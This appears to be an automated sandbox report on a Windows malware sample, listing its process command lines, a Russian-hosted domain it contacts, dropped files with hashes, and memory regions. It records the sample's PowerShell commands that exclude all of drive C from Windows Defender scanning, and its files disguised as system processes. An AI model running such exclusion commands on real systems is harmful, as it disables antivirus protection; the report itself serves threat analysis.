"powershell" -Command Add-MpPreference -ExclusionPath 'C:/comServerRefcrtNet/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1QWUF8ga47.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\w32tm.exe

w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe

"C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033\winlogon.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/comServerRefcrtNet/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/MSOCache/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lr5Zi8WiUT.bat"

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\PING.EXE

ping -n 10 localhost

Network

Country Destination Domain Proto
US 8.8.8.8:53 cx38856.tw1.ru udp
RU 92.53.96.121:443 cx38856.tw1.ru tcp
RU 92.53.96.121:443 cx38856.tw1.ru tcp

Files

\Users\Admin\AppData\Local\Temp\hwid.exe

MD5 816e9b3d8faf4363950a3d9129827a11
SHA1 7da1893debf23ed95d8e7ca8c1c50cd7fdba7c4e
SHA256 21859a1ca0ee915f6da48d6377c75854abe0aec5710621db0179390795f478e0
SHA512 dbe55c87fb5a78b1a0af228d9c32e7b81349c058fbe8bef07b4a9efdeee6d1fbf3c713809996398cb51a48ea9811dc4ad326c9da0dfcd93f7cb084346ec95f3b

C:\Users\Admin\AppData\Local\Temp\ZOROLOK.exe

MD5 b045a059a8ea1e07b8683c4dcad8bf33
SHA1 2e0c49010ae8b71c4a89667ef4acc7ecb92f8d13
SHA256 7e9ac472cbfb7e7955ea76ceb80d1a350158a83f043796e31b2050307cbba7d2
SHA512 b4716cb4bac88720f1ead0ccfe91e5f6aee481d2bc19335750a34689cda3c57c805bf4eaadb6c739e5faceee9e3f57e93f081c46993782580688b6b9ccc6ba1f

memory/2768-12-0x0000000000400000-0x0000000001400000-memory.dmp

C:\comServerRefcrtNet\mqTOHq8aHZClYn48E.vbe

MD5 e9b30ad4a605da5d269fcf68e8460dee
SHA1 379b8c9c8e09497a763d346e0c9962e7d12f1b24
SHA256 aad887b3e8d352a4157320bab3a082e25bbd651443cb85c43fd5a368246e5c41
SHA512 6f0e22fc3146b0a2c306a2e67d5984c396cd30c845ecd86db52a2705f68545cfc57f0ad6735b0280487239251c7eeccda2ceec24bd88815746fe74b17ad8773e

memory/2740-23-0x0000000000BF0000-0x0000000000D86000-memory.dmp

\Users\Admin\AppData\Roaming\d3d9.dll

MD5 73bd889f94de4bfc1d8262c57aa53c8f
SHA1 ead79448f3a883c587ae1f2e26d2f71b18a38b50
SHA256 dc9c1747e3f6bcc2eaccdca84ab8f76881dfc04cf0c06fc00f1c02ec2c1f0609
SHA512 05dab2f0b978aa34d3fa59bf89c0061622a0fc99c4f00570cbc42dbe371edbd3444cda7cde4ccff521b36a4dea74464759571ea35e21312da538ae19564f11d5

C:\comServerRefcrtNet\lnxvZRavX52Sj8TeqZsoOZAX1b085ZLmiJmz2YXZ5HGWoFSPgyZVlmrEm.bat

MD5 3fae6518481781ecb7456ab4febba3bf
SHA1 28aefef1012344b0226e2a3f21f9bf1bd89c3acf
SHA256 db0ac9dd933a8546f18f86d8985ac579b6f50ac5242b7980b99512a7429375ff
SHA512 781678b5c9bdeaf273cb4ca7343b5e0725cea5020ce2cf8e4eb85da18e0e87ebb6a96a7d059a320731f06265cad8485ccc372820d8474706ed532f794a053e24

\comServerRefcrtNet\ComsurrogateHost.exe

MD5 0f955b3f70b28d7303d8ac1327639d24
SHA1 98005ccb926070a45d58dc905cf73d8de6943953
SHA256 3dad4c00a25d6d16be232f43deb4ba480731fac732db4443932545894911a1a8
SHA512 a5f9567f911c3b76f15a9e400cdb73caca6f2fb819039480bb0af2ec9a1b6861a44d935fa08fa76da9cab0810bdb96a1a4b345f87d72b96a2840d44d4aba9706

memory/3012-33-0x0000000000230000-0x00000000003EE000-memory.dmp

memory/3012-35-0x0000000000430000-0x000000000043E000-memory.dmp

memory/3012-37-0x00000000005E0000-0x00000000005FC000-memory.dmp

memory/3012-39-0x0000000000600000-0x0000000000618000-memory.dmp

memory/3012-41-0x00000000005C0000-0x00000000005CE000-memory.dmp

memory/3012-43-0x00000000005D0000-0x00000000005DC000-memory.dmp

memory/3012-45-0x0000000000620000-0x0000000000630000-memory.dmp

memory/3012-47-0x0000000002250000-0x00000000022AA000-memory.dmp

memory/3012-49-0x0000000000630000-0x000000000063E000-memory.dmp

memory/3012-51-0x0000000000670000-0x0000000000688000-memory.dmp

memory/3012-53-0x0000000000650000-0x000000000065C000-memory.dmp

memory/3012-55-0x000000001A910000-0x000000001A95E000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 b1b1f161a19fb5c4ab7932ae80ed0153
SHA1 e94a65e8e87b2398d8edb0251ed0e5c2b06e6c75
SHA256 ea609228d4fe580da43bf86d8524a65e3db886fe5464cf4eec8aaa5eb50e051c
SHA512 d0e513357ea993703cd7a310e9dbdea13b9f9f0c74799a1eb25f58061a956563a4bae150c99d8a1d09f0a8e03373bd48f2e91b9c93961c0ba0870b011da642de

memory/1540-127-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

memory/2440-128-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\bbyzxjhe\bbyzxjhe.cmdline

MD5 61d4de9930ac1a91c3d7761a8a07b9db
SHA1 9837f8926e7450a99c71b168b20164b1c2ea08ed
SHA256 fd85e69d51160d35622f79d593b75d24dc525c9720bf1cbaf8ed4d9d28415972
SHA512 14321de1ce99cda70b5219f1489464ad048f3d42f22a8f4e925ca7ee50ada2947a3e3f714a0c28496985f0272f726d7365a36d973fc5a7843dce75e2748a235f

\??\c:\Users\Admin\AppData\Local\Temp\bbyzxjhe\bbyzxjhe.0.cs

MD5 7065c4155a02904765e56bf9a65ad894
SHA1 96cb5474bc1f16c55b9420729f0ea8ea341766cc
SHA256 89599adb72cb78d66c88e45b0bd354e34792ff53ae3490cbe660cf7da7a63aa1
SHA512 7c819fda7a715208c61913ad4be1794c1907ee88272734a0d2c6cb96032c868c7ff208e4b9962c3038484b510b0fdc66b3d78b27211b07351004b1cd27af594d

\??\c:\Windows\System32\CSCD632E12AB0041D0975A814584C955D9.TMP

MD5 9f32e217907de2ff7b3c3ad4297589df
SHA1 67955dc01ed3a57d836a2b53f6c9314261c1ed0f
SHA256 397d3fe0bc8496bf85a8b939cc1690197583469b69db5ce21ab4c0f600b983ff
SHA512 144599e25851b4a6dd07b1019266a0259ef63a554a1c77c926075209811dd5df7cd0e3a79cb2c902ae7e8af5e061f28256dd6f026b09d9ce6d08b15c1e9cd73c

C:\Users\Admin\AppData\Local\Temp\RES8037.tmp

MD5 32cd7e6aacca4f7dc9be7b092ba676d0
SHA1 1c077268ebe5d7d622275a11ef487b65f132fc42
SHA256 3cbeff242546c26af7d29cb82906b1e7bd7c1b16960971e661eb0e9773cff952
SHA512 ea12a417cfcdfe949666e1d1c3a8c0b6358cf88fc595285a948645fa5c2be4ffda12e522698ccfbed061dcbc43cf0bfcb3a964c832fbc811d9cab10e21ee5b27

C:\Users\Admin\AppData\Local\Temp\NzET29XDKR.bat

MD5 7ab603881b0809e1991b72e1c6c35154
SHA1 56ef2512d0b653c437ef7b1620d34a193a0dd7ee
SHA256 baa804e57798772c5b185bb9b67bc6a1d5fadb6910f41fd413d662ac40e1fd36
SHA512 c677cba31d1a39385808715f1b861eed18975fd370d4db81ba8c9e3bef9ec440a144e7482e55e67d8157d5e99741c98fb5245cde2dea465131c2c1f687f0409b

memory/1216-148-0x0000000000340000-0x00000000004FE000-memory.dmp

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1760-171-0x000000001B7B0000-0x000000001BA92000-memory.dmp

memory/1760-172-0x0000000000490000-0x0000000000498000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 68f635a77af0f6261e43e0271cb142eb
SHA1 39dd9b5b66d8b3a9387f2f55db3574748a3dc5c4
SHA256 15db33403ba45e0f4a76752388922176140b47de3999fc4a2c22c580d7614efb
SHA512 9ab98470e5dd8011fce8fca0c059b616d2ee1ac8531917c5e168be2f688577679c35e54cc7ed1b968e7becca490d4a6a783bfc1d297b9f5ff8fe068a662b6c46

C:\Users\Admin\AppData\Local\Temp\CabCE39.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\TarCE7B.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\Local\Temp\1QWUF8ga47.bat

MD5 2566f8a72cee085bd60c94ba67ab089b
SHA1 22ef760437f3e2007af163349300fe8f60e4866c
SHA256 e7b241fde5be6e93f951cca5c780b49075f6a3875ea70c4df9f6aefd17ea0082
SHA512 fcfb154655586fe32074b243c97d37e939bfc77fa629fda0dd91a8c6e1dfce8a0774fab2bad1d3155c3c75a65573d06311ba1788abbfc6a1104d1756d166de5c

memory/2500-274-0x00000000012E0000-0x000000000149E000-memory.dmp

memory/2036-306-0x000000001B530000-0x000000001B812000-memory.dmp

memory/1744-331-0x0000000001EF0000-0x0000000001EF8000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 9a6c3f8c89932391cfb6aa272096bd2e
SHA1 7776209c2dceef8579f775df4d493807f6cd606f
SHA256 aa848eace7306c3f0264c3ce5993dad8c2be7e440653666d5bb1afa689cc5134
SHA512 1640ab83d68d05a10abe070ba18002fd669a09287ef487d8b75850d5873b6721aee0e1b5184568dd9a2ff297bc37f914133e7df10f73809c302134012cca453e

C:\Users\Admin\AppData\Local\Temp\lr5Zi8WiUT.bat

MD5 e3816bf54d35cb7bd625a38275200bf0
SHA1 5650474f20c62c9b9e20a7b31b6f5e5bc34b9502
SHA256 ce12db14cf5ee3f7f7e01a6b4571d514225373a006c281aae31062029a6c508f
SHA512 61dfa1897f3f85d2de88796e352fdff4ff7a65771f484ebb3aa63da839f322796fe394bd51415a3496d8495dd0ede6bff59a41794501ef6666680bcf25f4e168